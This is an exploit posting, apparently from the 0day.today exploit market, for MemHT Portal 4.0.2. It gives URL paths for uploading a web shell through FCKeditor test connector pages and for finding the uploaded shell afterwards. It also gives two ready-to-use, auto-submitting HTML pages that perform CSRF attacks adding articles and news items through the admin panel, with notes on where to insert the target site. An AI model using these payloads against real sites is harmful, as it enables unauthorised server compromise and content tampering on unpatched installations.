[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MemHT Portal 4.0.2 Multiple Vulnerabilities

Author
DoSs-Dz
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-17917
Category
web applications
Date add
02-04-2012
Platform
php
+------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title    :  MemHT Portal 4.0.2 Multiple Vulnerabilities (Arbitrary File Upload Vulnerabilirty/CSRF add article/ add News )
# Date              :  05/april/2012
# Author           :  Expl0!Ts
# Software link  :  http://www.memht.com/files/memht_portal/releases/MemHT_Portal_4.0.2.rar
# Version          :  4.0.2   
# Category        :  WebApps
# Tested on       :  windows 7/xp/Ubuntu 10.10
# Thanks           :  http://1337day.com all Inj3ct0r Member & http://exploit-db.com
+------------------------------------------------------------------------------------------------------------------------------------------------+
1) Arbitrary File Upload Vulnerabilirty : 
 
1.1
     
     First P0c  :-->  http://127.0.0.1/<PATH>/files/inc/fckeditor/editor/filemanager/connectors/uploadtest.html  <--- Upload your shell (asp/php..)
     
     Second P0c :-->  http://127.0.0.1/<PATH>/files/inc/fckeditor/editor/filemanager/connectors/test.html <--- Upload your shell (asp/php..)

1.2 
    
     To Find Your Upload File (sHell) : 
    
     http://127.0.0.1/portal/files/uploads/file/<Text.txt>  <--- Find Your shell

2) CSRF add article : 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Add Article By : Expl0!Ts  </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "127","216" );
function pausecomp(millis){var date = new Date();var curDate = null;do { curDate = new Date(); }while(curDate-date < millis);}function fireForms(){var count = 2;var i=0;for(i=0; i<count; i++){document.forms[i].submit();
        pausecomp(pauses[i]);}}
</script>
<H2> CSRF Add Article By : Expl0!Ts </H2>
<form method="POST" name="form0" action="http://Site/path/files/admin.php?page=articles&op=addArticle&ok=true">  <-- Edit here : change path directory & Site
<input type="hidden" name="nome" value="Test Hack By Expl01Ts"/>    <-- article name
<input type="hidden" name="argomento" value="6"/> 
<input type="hidden" name="descrizione" value="Hiiiiii"/>
<input type="hidden" name="testo" value="Hiiiiiiiiiiiiiii"/>
<input type="hidden" name="tags" value="hi"/>
<input type="hidden" name="autore" value="Expl0!Ts2"/>
<input type="hidden" name="language" value="0"/>
<input type="hidden" name="usecomments" value="1"/>
<input type="hidden" name="enabled" value="1"/>
<input type="hidden" name="Submit" value="Add"/>
</form>
</body>
</html>



3) CSRF add News :

 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Add News By : Expl0!Ts </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "286","284" );
function pausecomp(millis){var date = new Date();var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);}function fireForms(){var count = 2;var i=0;
for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}}    
</script>
<H2> CSRF Add News By : Expl0!Ts </H2>
<form method="POST" name="form0" action="http://Site/path/files/admin.php?page=news&op=addNews&ok=true"> <-- Edit here : change path directory & Site
<input type="hidden" name="nome" value="news Title 3"/>   <-- News name
<input type="hidden" name="argomento" value="1"/>
<input type="hidden" name="testo_home" value="hoooooo5"/>
<input type="hidden" name="testo" value="hooooo"/>
<input type="hidden" name="tags" value="hi"/>
<input type="hidden" name="language" value="4"/>
<input type="hidden" name="usecomments" value="1"/>
<input type="hidden" name="enabled" value="1"/>
<input type="hidden" name="Submit" value="Add"/>
</form>
</body>
</html>




+--------------------[!Expl01t3d By : Expl0!Ts !]-----------------------------+
# Greets T0 : robert miles & Yasser X-man & Waille allane & Hacker Dz 
# sec4ever.com & Dz4all.com & v4-team.com .... 
+--------------------------------------------------------------------------------+
./The EnD 
 ..::Ilove mY allaH & Mohamed Rasoule al llah::..



#  0day.today [2024-10-05]  #